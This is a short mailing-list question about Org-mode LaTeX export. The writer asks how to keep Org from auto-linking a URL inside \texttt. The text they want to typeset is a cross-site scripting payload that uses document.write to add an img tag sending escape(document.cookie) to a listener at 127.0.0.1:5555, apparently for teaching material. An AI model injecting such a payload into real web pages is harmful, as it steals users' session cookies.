Hi,
I am trying to write something like this in org, which I wish to publish to LaTeX:

\texttt{<script>document.write(`<img src=http://127.0.0.1:5555?c=' +
escape(document.cookie) + `   >'); </script>}

But I am ending up with something like this:

\texttt{<script>document.write(`<img src=[[http://127.0.0.1:5555?c%3D][http://127.0.0.1:5555?c=]]' +
escape(document.cookie) + `   >'); </script>}

How should I be able to display the http part without org automatically turning it into a link?

Thanks in advance


--
Warm regards,
Bodhisatta Barman Roy